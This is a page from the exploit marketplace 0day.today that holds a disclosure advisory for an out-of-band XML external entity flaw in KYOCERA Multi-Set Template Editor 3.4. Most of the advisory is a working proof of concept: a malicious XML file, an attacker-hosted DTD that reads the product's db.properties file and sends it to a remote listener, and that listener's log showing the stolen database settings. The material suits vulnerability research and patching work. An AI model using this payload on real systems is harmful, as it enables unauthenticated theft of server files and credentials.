0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Vulnerability
#Vendor: KYOCERA Corporation #Product https://global.kyocera.com #Affected version: 3.4.0906 # #Summary: KYOCERA Net Admin is Kyocera's unified #device management software that uses a web-based #platform to give network administrators easy and #uncomplicated control to handle a fleet for up to #10,000 devices. Tasks that used to require multiple #programs or walking to each printer can now be #accomplished in a single, fast and modern environment. # #Desc: KYOCERA Multi-Set Template Editor (part of Net #Admin) suffers from an unauthenticated XML External Entity #(XXE) injection vulnerability using the DTD parameter #entities technique resulting in disclosure and retrieval #of arbitrary data from the affected node via out-of-band #(OOB) channel attack. The vulnerability is triggered when #input passed to the Multi-Set Template Editor (kmmted.exe) #called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll #is not sanitized while parsing a 5.x Multi-Set template XML #file. # #Tested on: Microsoft Windows 7 Professional SP1 (EN) # Apache Tomcat/8.5.15 # # #Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience # # # #Advisory ID: ZSL-2018-5459 #Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php # # #28.03.2018 # #— # # #Malicious.xml: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE ZSL [ <!ENTITY % remote SYSTEM "http://192.168.1.71:7777/xxe.xml"> %remote; %root; %oob;]> Attacker's xxe.xml: <!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties"> <!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> "> Data retrieval: lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777 Serving HTTP on 0.0.0.0 port 7777 ... 192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 - 192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 - # 0day.today [2024-07-07] #